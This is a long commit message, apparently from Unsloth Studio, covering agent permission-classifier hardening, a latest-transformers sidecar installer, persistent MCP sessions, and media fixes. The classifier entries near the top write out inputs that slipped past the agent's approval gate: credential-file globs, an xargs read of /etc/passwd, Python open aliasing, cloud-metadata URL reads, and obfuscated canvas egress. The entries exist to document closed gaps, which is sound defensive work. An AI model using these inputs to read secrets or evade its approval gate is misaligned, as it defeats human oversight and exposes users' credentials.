A truncate_log column and a grants table stay safe.
- A glob that resolves to a credential basename anywhere (cat ~/.huggingface/tok?n
-> token, cat proj/.netr? -> .netrc, cat repo/.aws/cred*) now asks; the fixed
target list only covered a handful of home paths. notes/dra?t.txt and
token_counts.tx? stay safe.
- uniq / xxd counted file positionals but skipped every numeric token to ignore
a flag value, so a file literally named with digits (uniq 123 out) hid the
output positional. Track each command's value-taking flags and consume only
the value, so uniq -f 2 in stays safe while uniq 123 out asks.
Regression rows added to test_permission_mode.py.
* Isolate the permission-mode loop tests from process-global state
The loop-driving tests (auto/off/full/bypass) drove run_safetensors_tool_loop
against a process-global approval registry (state.tool_approvals._pending)
keyed by a single shared session id, and read os.environ. Other backend test
modules mutate both, some at import time, so in the full-suite ordering a stale
pending approval or a leaked env var could make the loop deny or skip a call
these tests expect to run. It passed when the file ran alone but failed only in
the complete tests/ run on CI.
Add an autouse fixture that snapshots and restores os.environ and the approval
registry around each test, and give every _drive call a unique session id so a
leaked approval can never collide. Attach a compact event-stream dump to the
loop assertions so any residual full-suite-only failure reports what the loop
actually did instead of a bare diff.
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* Studio: harden auto-mode classifier for recursive listers, sort file lists, aliased invokers, single-member extract
Close four fail-open gaps in is_potentially_unsafe_tool_call:
- terminal: tree/du (always recursive) and ls -R rooted at an absolute or
tilde path now ask, matching the existing grep/rg/find recursive-read gate;
relative walks stay safe.
- terminal: sort --files0-from=F reads the file list named in F, so it can
read arbitrary host files indirectly; added to sort's unsafe flags.
- python: track aliases of the higher-order invokers (m = map;
from itertools import starmap as sm) so an aliased invoker handed open/a
writer is still gated; a benign callable (map(len, ...)) stays safe.
- python: single-member archive extract (ZipFile/TarFile.extract) writes to
disk like extractall and is vulnerable to a crafted member path, so gate it.
Also update the stale _FakeExecuteTool in test_permission_mode.py to accept
the thread_id keyword that run_safetensors_tool_loop now forwards to
execute_tool after the main merge, which had broken the five tool-loop tests.
Adds regression rows covering each gap plus benign controls.
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* Studio: normalize unknown permission_mode to 'ask' instead of a 422
The request models validated permission_mode with Literal[ask, auto, off,
full], so an unrecognized value from a newer UI/client was rejected with a 422
before the tool loops could apply their unknown -> ask fallback
(safetensors_agentic.py:464, llama_cpp.py:9001). That made the intended
forward-compat degradation unreachable at the API boundary for both Chat
Completions and the analogous Anthropic field.
Accept a plain string on both ChatCompletionRequest and AnthropicMessagesRequest
and normalize in a before-validator: None stays unset, the four known modes pass
through, and any other value degrades to the safest gate ('ask'), matching the
loops. Adds a regression test covering unknown/None/known across both models.
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* Studio: close five more auto-mode classifier gaps
- terminal: xargs is no longer a safe wrapper. It appends arguments read from
stdin that the scan never sees, so `echo -o out /etc/passwd | xargs sort`
forwards to `sort -o out /etc/passwd` (a write + sensitive read) while only
the allow-listed literals are visible. Any xargs command now asks.
- terminal: ionice -p/-P/-u change the I/O priority of an already running
process / group / user instead of forwarding to a wrapped read-only command,
so `ionice -c 3 -p <pid>` now asks. ionice -c 3 <cmd> stays safe.
- MCP: gate ALTER SYSTEM, which persists PostgreSQL server configuration and was
not one of the DDL objects the mutation detector matched.
- MCP: a credential noun in a read-named tool (read_secret, list_tokens,
get_credentials, fetch_api_key) is a sensitive disclosure, so it asks even
without a mutating verb or a path/SQL argument. Scoped *_key nouns keep a
primary_key / keyboard lookup safe.
- render_html: no longer unconditionally safe. A static canvas still auto-runs,
but one whose HTML/JS reaches the network (fetch/WebSocket/remote script) asks,
since it can egress under the canvas CSP when artifact network access is on.
Its early provisional card is suppressed under the auto confirm gate, and the
confirm-without-stream guard now requires a stream when render_html is
selectable.
Adds regression rows and benign controls for each, and updates the render_html
provisional-card and confirm-gate tests to the new behavior.
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* Studio: extend auto-mode gates for indirect file lists, dynamic lookups, HTML network loads, and Anthropic render_html
Follow-ups on the previous classifier round:
- terminal: wc/du/find --files0-from (and find's -files0-from primary) read a
NUL-separated list of input paths from a file, the same indirect mechanism as
sort --files0-from, so a crafted list reads arbitrary host files past the
literal path/root checks. Gate them like sort.
- python: a namespace lookup through a dict-style call (f =
__builtins__.__dict__.get('open'), globals().get('open'), vars(x).get(...))
can return open/eval/a mutator, so poison the bound name like getattr/subscript
lookups already are. An ordinary dict .get or os.environ.get stays safe.
- render_html: broaden the network detector so a canvas that loads a resource
via CSS url()/@import, srcset, or a root-relative (/path) or protocol-relative
(//host) src/href is treated as networked, not just fetch/WebSocket/remote
script. Relative ./x and url(#id)/data: refs stay static/safe.
- Anthropic /v1/messages: drop render_html from the unprompted-safe server-tool
set. Since it can prompt (networked canvas) and this channel invokes the loop
without confirm, selecting it under ask/auto/omitted now rejects like
terminal/python; off/full (or an explicit confirm opt-out) run it.
Adds regression rows and benign controls for each, plus an Anthropic route test.
* Studio: close six more auto-mode classifier gaps
- terminal: a glob that expands to a project .env (cat .e?v) now asks; .env
joins the sensitive glob-basename set, matching the literal-path gate.
- python: an open bound onto an attribute (box.f = open; box.f('out','w'))
is tracked by attribute name, and open invoked via .__call__
(open.__call__('out','w'), unwrapped to the underlying callable) is gated,
so neither slips past the name-based open-alias checks. Benign attribute
callables and .__call__ on non-writers stay safe.
- python: a namespace lookup via .get/.pop/.setdefault already covered the
builtins case; unchanged here.
- MCP: a mutating HTTP verb in a method/verb argument (get_url
{"method": "DELETE"|"POST"|"PUT"|"PATCH"}) now asks, so a generic HTTP
tool cannot mutate an external service unprompted; GET/HEAD stay safe.
- MCP: a credential/secret environment-variable value (get_env
{"name": "OPENAI_API_KEY"}) is treated as a sensitive read via the same
credential-noun match used for tool names; PATH/HOME stay safe.
- render_html: self-navigation sinks (location.assign/replace, window.open,
assigning a URL to (window.)location(.href)) join the network detector, so a
canvas that navigates itself to an external URL asks; location.reload() /
history.back() stay static.
Adds regression rows and benign controls for each.
* Studio: gate obfuscated canvas egress, sensitive-dir iteration, and MCP metadata-host reads
- render_html: strip block comments before the network scan so fetch/*x*/(...)
cannot hide egress, and match bracket-access forms (window['fetch'](...),
self['open'](...)). Line // comments are left alone so the // in an https URL
is not eaten. A comment-only canvas stays static.
- python: enumerating a directory outside the sandbox (Path('/etc').iterdir(),
os.scandir('/etc'), os.listdir('/home'), os.walk('/')) reads host filenames
the direct /etc/passwd checks would prompt for, so gate it when the target dir
folds to an absolute/tilde/sensitive path; a relative dir stays safe and an
unresolved dynamic dir is left to other checks.
- MCP: a read-named HTTP tool pointed at a cloud-metadata / link-local host
(fetch_url {"url": "http://169.254.169.254/..."}, metadata.google.internal)
reads instance credentials, so classify those URL arguments as sensitive,
mirroring the sandbox SSRF blocklist; ordinary and localhost URLs stay safe.
Adds regression rows and benign controls for each.
* Studio: gate meta-refresh navigation, pandas HTML/markdown exporters, absolute glob roots, and checksum verify mode
* Studio: gate starred open writes, builtins.__import__, computed render_html sinks, and procfs fd reads in auto mode
* Studio: gate remote worker canvases, huggingface_hub downloads, and write callables passed to user helpers in auto mode
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* Studio: offer the latest transformers release for brand-new architectures
When a model's config.json model_type is absent from every installed
transformers overlay (base 4.57.x and the .venv_t5_530/550/510 sidecars),
Studio now checks, unauthenticated and cached, whether the newest
transformers ships it:
- utils/transformers_latest.py fetches the latest release version from
https://pypi.org/pypi/transformers/json and the CONFIG_MAPPING_NAMES
sources for that tag and for main from raw.githubusercontent.com
(never api.github.com), parsing them with the same AST extractor the
static router uses (no code execution, no trust_remote_code). Results
are cached in memory and in a JSON snapshot under studio_root()/cache
with a one day ttl; fetches are bounded to 5s with one retry and a
failure backoff, and offline mode or the new kill switch
UNSLOTH_STUDIO_NO_LATEST_TRANSFORMERS=1 short-circuits to None.
- POST /api/inference/validate gains requires_transformers_upgrade plus
a transformers_upgrade payload (model_type, pypi_version,
supported_in_pypi, supported_in_main) so the frontend can raise the
install consent dialog before /load, mirroring the existing
remote-code consent flow. The check fires only when the model_type is
unknown to all installed overlays and the hardcoded tier tables.
- POST /api/inference/install-latest-transformers provisions a new
persistent .venv_t5_latest sidecar after user consent, pinned to the
exact PyPI version (re-verified server-side) with the same
--target/--no-deps recipe as the fixed sidecars. A JSON pin marker
inside the dir records the installed package set, so restarts
revalidate it and routing resolves the new highest-ranked tier
automatically. A dependency preflight (compat_plan) compares the
release's requires_dist against the running env: unsatisfied
tokenizers/safetensors floors are shadow-installed as exact pins into
the sidecar, anything else unsatisfied blocks the install with a
clear message.
Routing for every already-supported model_type is unchanged: the
hardcoded lists and the 530/550/510 static resolver run first, the new
tier only participates once its venv exists, and the probe order gains
the latest sidecar only when provisioned. Verified against live PyPI
and GitHub (transformers 5.13.0: 674 model_types, 26 absent from all
installed overlays, e.g. cosmos3_omni; 4 dev-only on main) and with a
real sidecar install plus restart persistence. 64 new tests; the
existing 200-test transformers_version suite passes unchanged.
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* Latest-transformers check: fetch outside the lock, serialize installs
Release the module lock during the network refresh so a slow fetch cannot
stall other threads in the ASGI pool; concurrent callers during a fetch get
None (the graceful fallthrough) via an in-flight flag instead of stacking
fetches. Serialize install_latest_transformers with an in-progress flag so
concurrent consents cannot race the sidecar delete and recreate; the loser
gets a structured already-in-progress refusal.
* Latest-transformers check: LoRA bases, pin-gated mapping, live reverify
Run the upgrade check over the [adapter, base] target set so a LoRA whose
base model is a brand-new architecture surfaces the prompt (the worker
activates transformers for the base, not the adapter).
Gate the latest overlay's mapping lookup on a valid pin marker, matching
activation and the probe order, so a partial or manual .venv_t5_latest dir
cannot be routed to and then refused at activation.
Re-verify the requested version against a live PyPI snapshot at install
time, falling back to the cached one on fetch failure, so a release
published inside the cache TTL is not silently missed.
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* Latest-transformers check: nested config types and latest-tier vision probe
Collect every model_type in the config (top level plus each nested
sub-config) and signal on the first one missing from all installed
overlays, so a supported wrapper carrying a brand-new backbone still
surfaces the upgrade prompt; wrappers instantiate sub-configs through
CONFIG_MAPPING and would fail on the nested type.
Route the vision capability subprocess through the pinned latest sidecar
when the model resolves to the latest tier, so latest-only VLMs are not
misclassified as text-only; every other tier keeps the 5.5 sidecar used
today.
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* Latest tier: nested routing, vision probe after raw miss, safe upgrades
Route by every model_type in the config: a nested sub-config type can raise
the tier (wrappers instantiate sub-configs through CONFIG_MAPPING), so a
supported wrapper with a latest-only backbone routes to latest once
installed instead of staying on default. An unknown nested type never
vetoes; the primary type keeps its previous semantics. The collector is
shared with the upgrade checker.
Vision detection: when the raw heuristics say False for a model that routes
to the latest tier, run the AutoConfig subprocess under the pinned latest
sidecar instead of trusting heuristics built from older transformers.
Provisioning: stage-and-swap. Build the new sidecar in .venv_t5_latest.staging
and swap it in only when the install and pin marker are complete, so a failed
upgrade never destroys a previously working sidecar; restore the old dir if
the final swap fails.
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* Latest-transformers checker, vision subprocess, and cache fixes
Require the latest release to support every missing model_type (the
primary included) before prompting; a nested-only match cannot make the
model loadable, so no install is offered for it.
The vision-check subprocess now unions the active sidecar's own
registry mappings into the inlined parent-process detection sets, so
architectures only the sidecar knows classify correctly.
A successful sidecar install clears the tier probe cache, the latest
tier's model_type mapping, and the vision-detection cache so the new
venv takes effect without a restart. Tests for all three.
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* Aggregate upgrade support flags and keep install off /v1
The upgrade signal now reports supported_in_pypi only when the latest
release covers every missing model_type; a mix with a main-only nested
type surfaces as dev-only so no PyPI install is offered that would
still fail at load. The consented install endpoint moves to
studio_router so it is not reachable through the OpenAI-compatible /v1
mount. Tests for both.
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* Honor the latest-transformers kill switch in routing
With UNSLOTH_STUDIO_NO_LATEST_TRANSFORMERS set after the sidecar was
provisioned, the latest tier still joined mapping and probe routing
because only the pin was checked. Both admission points now also check
the kill switch, so operators can roll back a problematic sidecar
without deleting files.
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* Repair the latest sidecar through stage-and-swap
The lazy repair path installed into the live .venv_t5_latest, which
_ensure_venv_dir wipes first, so a failed repair deleted the pinned
sidecar and its marker. Both the consented install and the repair now
share one stage-and-swap helper: the incomplete-but-pinned dir survives
any failure and a later attempt can still repair it.
* Tighten comments
* Remove the staging dir when a latest-sidecar install fails
A pip failure inside _ensure_venv_dir returns False without raising, so
the except cleanup never ran and the partial .venv_t5_latest.staging
leaked until a later attempt. Also note on the validate response fields
that frontend consumption ships in the follow-up PR.
* Add the transformers-upgrade consent dialog to the frontend
When /validate reports requires_transformers_upgrade, every explicit load
path (chat runtime and the compare composer) now pauses on a consent
dialog modeled on the remote-code one: it names the model_type and the
latest PyPI transformers version, and on Accept calls
/api/inference/install-latest-transformers itself, shows an installing
state, and resumes the original load automatically on success. Errors
surface in the dialog with a retry; Cancel aborts the load like the
trust dialog's deny path. Architectures shipped only on transformers
main get a dev-only notice with no install button. Background auto-load
skips upgrade-requiring candidates instead of prompting, mirroring the
trust_remote_code rule. The dialog mounts once in the root layout and
runs before the security dialogs, since no load can proceed without the
runtime.
* Route a non-installable new architecture to the custom-code consent as a last resort
When the upgrade dialog has no installable PyPI release (the architecture
is only on transformers main, which Studio never installs), the dialog now
says so explicitly, and when the model also declares custom (auto_map)
code it offers Continue with custom code: resolving the paused load into
the existing trust_remote_code consent gate instead of hard-aborting.
Models with no custom code keep the Cancel-only notice. The backend
returns no upgrade signal at all for architectures unknown to both PyPI
and main, so those still route straight to the unchanged security gate.
* Force a 16-bit load for models on the latest-transformers sidecar
Live validation with Zyphra/ZAYA1-8B (model_type zaya, shipped by
transformers 5.13.1 but unknown to every installed tier) surfaced a
generation crash when the consented sidecar load kept the default bnb
4-bit quantization: transformers' grouped-MoE kernels feed the packed
uint8 expert weights straight into torch._grouped_mm, and generation
dies (plain 16-bit works). New latest_tier_active_for() mirrors the
sidecar activation's tier resolution and never raises; the inference
worker flips load_in_4bit off when it reports true, and the load route
applies the same flip so the pre-load VRAM guard and the worker command
agree. Fixed tiers are untouched. With the guard, ZAYA1-8B loads and
generates correctly in Studio chat.
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* Offer the custom-code fallback when a latest-sidecar install fails
* Fail remote mapping fetches wholesale and mirror the 16-bit flip in validate
A transient fetch or parse failure of one auto-mapping file no longer caches
a partial latest-release map for the TTL (a real 404 on pre-5.10 tags is
still tolerated), and validate_model now applies the same latest-sidecar
16-bit sizing flip as /load before the training guard so the two agree.
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* Tighten comments in the latest-transformers changes
* Resolve remote LoRA bases, fold nested tiers, and guard the sidecar swap
latest_tier_active_for now resolves a remote adapter's base model the same
way worker pre-activation does (and returns early without a sidecar pin), a
hardcoded fast-path tier is raised when a nested sub-config's model_type
needs a higher sidecar, and the install route refuses to swap .venv_t5_latest
while training runs on it and unloads a latest-tier chat model first.
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* Gate the sidecar install on worker liveness and size installable upgrades 16-bit
The install route now refuses while any training or export runs (tier
re-resolution without the load token is unreliable for gated repos), holds
the inference lifecycle gate across the unload and the swap so no load can
interleave, and passes the model name to unload_model. validate_model runs
the upgrade check before the training guard and sizes an installable
upgrade as 16-bit, matching what /load and the worker will force after the
consented install.
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* Close the sidecar install races and honor the kill switch over cached mappings
Training starts and mutating export routes now refuse while a transformers
install is in progress (shared is_install_in_progress flag), the chat unload
and idle export-worker teardown moved into a before_swap hook that runs only
once the staged install succeeded, and _config_model_types checks the kill
switch before returning a cached latest mapping.
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* Reserve the sidecar swap before the gate wait and abort it on failed teardown
The install-in-progress flag moved into a shared sidecar swap reservation in
transformers_version, taken by the install route before awaiting the
inference lifecycle gate (so training and export starts see it for the whole
window) and by the lazy .venv_t5_latest repair path. The before_swap hook
now raises when the chat unload or export teardown reports failure, leaving
the previous sidecar untouched.
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* Back the sidecar swap reservation with a cross-process lock file
The lazy repair runs inside worker subprocesses, where a module-level flag
is invisible to the parent's route checks. The reservation now also creates
a lock file next to .venv_t5_latest (O_EXCL, owner-only removal, stale after
two hours for crashed owners), so is_install_in_progress sees a repair from
any Studio process.
* Hand the swap reservation to the installer thread and harden pre-swap teardown
A cancelled install request no longer releases the reservation while the
installer thread is still staging (the thread owns and releases it, shielded
from cancellation). The route refuses while another inference request is
generating, export teardown runs before the chat unload and is judged by
worker liveness rather than the cleanup return value, and a live inference
worker with no active model (failed load residue) is shut down before the
swap.
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* Keep the lifecycle gate with the installer and recheck the swap at spawn time
The gate moved into the shielded install task so a cancelled POST cannot
release the guard /load honors while the installer still runs, cached latest
probe results are ignored while the kill switch is set, and the training and
export subprocess spawns recheck the sidecar swap reservation right before
spawning (the route-level guards are one-shot and validation can outlast an
install's start).
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* Close the spawn-registration windows against the sidecar install
Training marks the spawn in progress before its reservation recheck and
is_training_active honors the flag, so the install route sees a start that
has passed proc.start() but not yet recorded _proc. Export load-checkpoint
rechecks the reservation after setting _export_active and before tearing
down the old worker, so losing the race keeps the loaded checkpoint instead
of surfacing a 500.
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* Refine the install-window interleavings around worker teardown
The inference busy count is rechecked under the lifecycle gate (streams
start by taking that gate, so nothing slips past a held gate), the training
handshake moved ahead of the VRAM-freeing before_spawn hook so a lost race
leaves chat/export intact, the export spawn-time check is op-aware (inside
an active op the install is the side that aborts), and the Xet-stall respawn
waits out a transient reservation instead of stranding the run.
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* Track the install's server-side unload and guard export ops against the swap
The upgrade dialog store records when its install actually ran (the server
unloads the active chat model before swapping), and the load flow then marks
the previous model as unloaded so a later cancelled gate still triggers
rollback; the custom-code fallback leaves the flag unset. _run_export gained
the same reservation handshake as load_checkpoint so an install cannot block
behind an hours-long export op instead of returning 409.
* Tighten comments in the install-guard and upgrade-consent changes
* Surface install-race refusals cleanly and roll back after a failed swap unload
/load refuses while the sidecar swap is reserved so a load cannot succeed
and immediately be unloaded by the pre-swap teardown, worker starts that
lose the install race raise a typed SidecarSwapInProgress mapped to 409
instead of a 500, the install response reports model_unloaded even on a
structured failure so the client can restore its state, and the compare
flow tracks the server-side unload like the primary load path and clears a
stale checkpoint on abort.
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* Type the export install races, scope the lock release, and keep the unload signal
Export load-checkpoint and export ops raise SidecarSwapInProgress (mapped to
409 in every export route) instead of a 400-shaped failure, the export spawn
check distinguishes repair reservations (always refused) from install ones
(op-aware), the swap lock release only unlinks a lock this process wrote so
a stale-superseded owner cannot drop the new owner's live lock, and the
frontend unload signal survives a superseding consent via read-and-clear
consumption instead of a reset.
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* Finalize a stalled run when the respawn loses the install race and latch the unload signal
The Xet-stall respawn timeout now finalizes the run as a failure instead of
raising into the pump's broad finalization catch (which stranded it in a
training state with no worker), and a successful install retry ORs the
model_unloaded signal with the latched value so a failed-after-unload first
attempt still triggers rollback.
* Recheck the swap under the load gate and latch the unload before resolver checks
/load rechecks the sidecar reservation after acquiring the lifecycle gate
(an install can reserve while the load queues on it), and the dialog store
latches model_unloaded as soon as the install response arrives, before any
resolver-identity guard, so a superseded consent's unload still reaches
whichever load consumes the signal next.
* Report cleared-state unload failures, guard queued installs, and fold name tiers
A failed chat unload that still cleared the orchestrator's model state now
reports model_unloaded so the client rolls back, the installer aborts with
a 409 when a model load completed while it waited on the lifecycle gate,
and the fixed-tier name fast path consults the config mapping when a latest
sidecar is pinned so an accepted upgrade routes to the sidecar it installed
(no I/O added to the unpinned path).
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* Report cleared-state unload failures and harden the spawn handshake flag
The failed-unload branch in before_swap now detects that the orchestrator
cleared its model state and reports model_unloaded before aborting (the
earlier commit claimed this fix but a scripting error dropped the edit),
the installer's queued-load check compares a load generation counter so a
same-model reload is caught, and both training spawn sites wrap everything
after the handshake in a guard that resets _spawn_in_progress on any
exception so a failed start cannot wedge is_training_active.
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* Bump the load generation when the load is published, not at load start
A start-time bump is already visible when the installer snapshots mid-load,
so a same-model reload completing after the snapshot looked unchanged and
could be unloaded by the swap. The counter now increments alongside the
active_model_name publish.
* Self-heal a broken pinned sidecar, guard lazy repairs, and refresh stale retries
A valid pin whose transformers source dir vanished now triggers the repair
from the routing path (with a five minute backoff after failures) instead of
silently routing latest-only models to older tiers, the lazy repair refuses
while parent-visible chat/training/export workers are active since it has no
teardown of its own, and a version-mismatch install failure carries the
superseding release so the dialog's Retry re-requests a version that can
succeed.
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* Flip latest-tier loads to 16-bit outside chat and protect export state
Training and export workers now apply the same latest-sidecar 16-bit flip
as the chat worker so a brand-new grouped-MoE architecture cannot reach bnb
4-bit through those paths, the latest-tier vision override returns None on
an inconclusive probe so a transient failure is not cached as not-vision,
and the install route refuses while an idle export checkpoint is loaded
rather than discard it with no rollback signal on a failed swap.
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* Address parallel-review findings on the sidecar guards and install checks
The training route sizes latest-tier jobs 16-bit before GPU selection, the
inference subprocess spawn rechecks the swap reservation like training and
export (covering the OpenAI auto-switch path) with the typed error mapped
to a retryable 409, compat_plan blocks the install when dependency metadata
cannot be fetched instead of proceeding unverified, snapshot model-type
lists must contain only strings, and pin-marker package specs are validated
against the sidecar's own package set before ever reaching pip.
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* Parent-only repairs, live-owner locks, remote-base activation, pre-teardown recheck
Lazy sidecar repairs now refuse inside worker children (whose empty backend
singletons cannot see live siblings) and run only in the parent where the
active-worker guard is real, swap-lock staleness requires the owner pid to
be dead so a slow live install is never superseded, both activation entry
points resolve a remote adapter's base model like the inference worker and
latest_tier_active_for already do, and load_model rechecks the reservation
before tearing down the old worker so losing the race keeps the current
model loaded.
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* Check workers under the repair reservation and keep state on refused swaps
The lazy repair now reserves first and checks workers under the reservation
(worker starts set their active markers before rechecking, so every
interleaving aborts one side), with export ops and in-flight inference loads
counted as active. The inference pre-teardown and spawn guards refuse only
repair reservations since an install shares the load's lifecycle gate and
aborts via its queued-load snapshot, a SidecarSwapInProgress raised before
teardown no longer clears the live model mirrors, and an export spawn abort
after teardown clears current_checkpoint so the page cannot claim a loaded
checkpoint with no worker.
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* Repair a present-but-incomplete latest sidecar from routing
The routing self-heal only fired when the pinned sidecar's transformers/
dir was missing. A sidecar that kept transformers/ but lost another pinned
package still routed models to the latest tier, and workers refuse
parent-only repairs, so every load failed until a manual reinstall. Routing
now validates the full pin (via _venv_dir_is_valid) and repairs any
incomplete sidecar under the same swap reservation and 5-minute backoff.
* Treat an unrepaired latest sidecar as unavailable in routing
When the pinned sidecar is incomplete and the lazy repair fails (offline,
pip failure, workers active) or is inside the backoff window, routing
returned the source dir anyway, sending models to a tier whose worker
activation is known to fail. Return None instead so models an older tier
supports keep loading there until a repair succeeds, matching the behavior
when the sidecar dir is missing entirely.
* Harden sidecar swap and repair against crash, survivor, and 16-bit paths
Reclaim a swap lock as soon as its recorded owner PID is dead instead of
waiting out the two-hour cutoff, so a crash mid-install no longer wedges
/load, training, export, and repair for hours. A lock whose PID cannot be
read yet still uses the long cutoff so the create-before-write window is
never mistaken for dead.
Probe process liveness with OpenProcess on Windows: os.kill(pid, 0) there
is CTRL_C_EVENT (a real Ctrl+C via GenerateConsoleCtrlEvent), not a
harmless check, and psutil is not always present.
Return whether _shutdown_subprocess actually killed the worker and keep the
live handle when it survives terminate/kill (an uninterruptible CUDA
syscall can outlive SIGKILL). The pre-swap liveness guard now trusts that
result, so the destructive .venv_t5_latest rename cannot proceed while a
live worker still holds sidecar modules.
Recover a sidecar stranded at .old when a swap's activation rename and its
rollback both fail: reading the pin restores it when no swap holds the
reservation, so latest-tier models are not permanently broken.
Resolve the latest tier in the parent for export loads and for explicitly
16-bit training runs, not only 4-bit ones: tier resolution self-heals an
incomplete sidecar, and repairs are parent-only, so those paths could not
recover before. Sidecar integrity and quantization are independent.
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* Revert the parent-side latest-tier repair probe on training and export loads
The probe ran before the route freed VRAM, so a resident chat or export worker
made _workers_active_for_repair() refuse the parent-only repair; the route then
tore that worker down and spawned a child that also cannot repair, so an
incomplete sidecar still failed to load. Repairing correctly requires running the
repair between the worker teardown and the child spawn, decoupled from VRAM
sizing, which is a larger change tracked separately. Restore the prior behavior
so these paths match the reviewed form and do not partially attempt a repair that
cannot complete while workers are resident.
* Honor failed worker shutdowns on load and revalidate the cached latest mapping
The fresh-load paths spawned a new worker straight after _shutdown_subprocess
without checking its result, so a worker that outlived terminate/kill (a wedged
CUDA syscall) had its handle overwritten by the replacement while it still held
GPU memory, and is_worker_alive/the pre-swap guard could no longer see it. Both
the inference load and the export checkpoint load now abort when the old worker
did not exit, so the load can be retried once it does.
_config_model_types returned a cached latest mapping without re-checking the
sidecar, so a sidecar deleted or broken in-process after its first parse was
never re-validated: routing kept sending latest-only models to the stale latest
tier while activation failed. The cached latest mapping is now dropped and
re-resolved (self-healing) when the sidecar is no longer intact.
* Drop cached latest mapping when the pin is gone; keep 4-bit for custom-code fallback
_latest_sidecar_intact now returns False when the pin marker itself is gone, not
just when a pinned package is missing. Otherwise a cached latest mapping outlived
a deleted pin: _config_model_types kept returning it, so routing sent latest-only
models to a tier whose worker activation then failed (no pinned version) until
restart. It now drops the cache and re-resolves to no latest tier. The
_overlay_transformers_dir caller already gates on a present pin, so it is
unaffected.
validate_model forced 16-bit sizing whenever a PyPI upgrade was merely offered,
even for a model that can fall back to its own auto_map code. /load loads such a
model 4-bit without the install, and the install route refuses while training is
active, so 16-bit sizing here returned a VRAM 409 for the only viable 4-bit path.
The offered-upgrade flip is now gated on the absence of a custom-code fallback;
an already-active latest sidecar still always sizes 16-bit.
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* Studio: persistent stdio MCP sessions so server state survives across tool calls
call_tool_sync spawned a fresh stdio subprocess per tool call
(keep_alive=False) and tore it down when the call returned, so any stateful
MCP server lost its state between calls: with @playwright/mcp,
browser_navigate opened the page in one subprocess and
browser_take_screenshot ran in a brand-new one, screenshotting about:blank.
Keep one connected client per (command, env) on a dedicated event-loop
thread and reuse it across calls:
- idle sessions are reaped after 5 minutes (in-flight calls excluded) and
everything closes at exit, preserving the old design's no-orphans property
- a dead subprocess is detected via is_connected() and retried once on a
fresh session; tool-level errors leave the session alone
- cancel and timeout semantics are unchanged, and a timed-out call does not
tear the session down
- updating a server's endpoint/env/enabled state or deleting it closes its
live session
- HTTP/SSE servers stay one-shot per call
* address review feedback
* fix stdio session cleanup
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* address review: unblock no-limit calls on close, drain borrowers before close, scope closes to url+env
* don't retry sessions closed by config changes, re-verify server row before caching, keep env secrets out of generation keys
* fail fast on connect errors and make the stdio key-lock wait cancellable
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* Harden persistent stdio MCP sessions: crash recovery, concurrency, scoping
- Evict a stdio session on any transport-level (non-ToolError) call failure and
do not replay it, so a mid-call subprocess crash can no longer poison the scope.
Never gate liveness on Client.is_connected() (it only reports that a session
object exists, not that the subprocess is alive); add a version-adaptive
dead-transport probe that works on fastmcp 3.0.2 and newer.
- Re-check closed/defunct/config and transport liveness after acquiring the call
lock, and retire a session before releasing the lock, so a queued same-scope
caller never reuses a session that another caller's timeout already retired.
- Force a ProactorEventLoop on Windows so the stdio transport can always spawn
subprocesses regardless of the active event-loop policy.
- Scope stdio sessions per conversation: require thread_id to persist, and tag
the fields so a session_id and a thread_id with the same value cannot collide.
A session_id alone is project-wide, so it now falls back to a safe one-shot
session instead of sharing browser/DB/REPL state across conversations.
- Forward thread_id on the Anthropic Messages path.
- Treat timeout=None as unlimited on connect and the key lock (was capped at 60s).
- Bound the session cache (default 32, override via
UNSLOTH_STUDIO_MAX_STDIO_MCP_SESSIONS) with LRU eviction of idle sessions.
- Run config_check on cache hits, and log a redacted exe#digest label instead of
the raw command so credentials in argv never reach the logs.
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* Trim the stdio MCP session cache on release and skip close-generation for HTTP servers
Two fixes from review of the persistent stdio session lifecycle:
- Re-enforce the session cap when a session goes idle. A concurrent burst of
distinct-scope calls can overshoot the cap while every cached session is busy
(insert-time eviction only reclaims idle sessions), and the overshoot used to
persist until the 5-minute idle reaper. _release_stdio_session now trims the
idle overshoot back within the cap, without ever evicting an in-flight call.
- close_stdio_sessions() now no-ops for a specific non-stdio (HTTP/SSE) url.
Those transports are never cached as stdio sessions, so calling it on every
HTTP server update or delete used to accrue an unbounded close-generation entry.
Both are covered by regression tests that fail before the change and pass after.
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* Keep the live stdio MCP session across a display-name rename
The edit dialog resends url, headers, and use_oauth unchanged whenever a
server is saved, so gating the tool-cache invalidation and stdio session
close on field presence dropped the persistent process on a plain rename
or any no-op edit. Gate on a real value change against the stored row so
only a genuine endpoint, auth, or enable change closes the session.
Regression tests: a rename that resends unchanged url/headers/oauth keeps
the session; a real command change still closes it.
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* Tighten comments in the stdio MCP session lifecycle
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Gallery clear/delete now scope to Studio-owned files: image_gallery and
video_gallery skip PNGs / MP4s without a readable recipe (a hand-dropped or
orphan file the listing already hides), so clear() and a guessed-id delete no
longer destroy files the gallery never surfaced.
Remote ControlNets now force use_safetensors: a bare owner/name reaches
from_pretrained without the base trust gate, and the Hub scan fails open when
unavailable, so requiring safetensors closes the pickle deserialization vector.
POSIX uninstall now stops resident sd-server / sd-cli under an owned sd.cpp root
before removing the tree (marker-gated), mirroring the Windows stop-before-delete
scan; a live native server no longer survives unlinking its binary.
Diffusion dataset containment: the training-start read path and the discovery
picker route bare names through the protected resolver, so a symlinked dataset
is rejected / not advertised like the caption/delete routes already do. Uploads
gain the inference decode guard (oversized real images 400 before OOMing the
trainer) and dataset upload/caption/delete/import are blocked with 409 while a
diffusion run is active.
JSONL readers (trainer + routes) tolerate non-object JSON and invalid UTF-8
instead of raising AttributeError / 500.
LoRA family compatibility is enforced in the shared resolver, not only the
picker, so a direct API client cannot apply a mismatched-family adapter.
GPU arbiter gains release_if so the image/video unload idle-check and release
are atomic against a concurrent same-owner load's registration. Native batch
recipes persist the base batch_seed and restore replays from it, so a native
batch_index>0 image no longer advances its seed twice.
FLUX.2-klein selects its sd.cpp text encoder by variant (4B -> Qwen3-4B,
9B -> Qwen3-8B) instead of the single family default.
POST /video/generate previously held the response open for the whole
generation (multi-minute for 720p), so in --secure mode the Cloudflare
quick tunnel's ~100s origin-response cap returned a 524 while the server
kept generating, and the frontend treated the run as failed.
Generation now follows the same return-at-once pattern as /video/load:
begin_generate validates synchronously (409 on no model or on a second
concurrent generate via a new busy sentinel) and runs the existing
generate + gallery-persist pipeline, with the route's exact error
mapping, on a daemon thread. GET /video/generate-progress gains optional
terminal fields: phase completed carries the saved gallery record, phase
failed a client-safe error; active only drops together with a terminal
phase. The cancel event is registered before the worker starts so
/video/generate/cancel keeps working across the whole job.
VideoGenerateResponse becomes an accepted acknowledgement (status
started, video kept as an always-null compat field). The video page
fires the POST, then drives completion off the progress poll it already
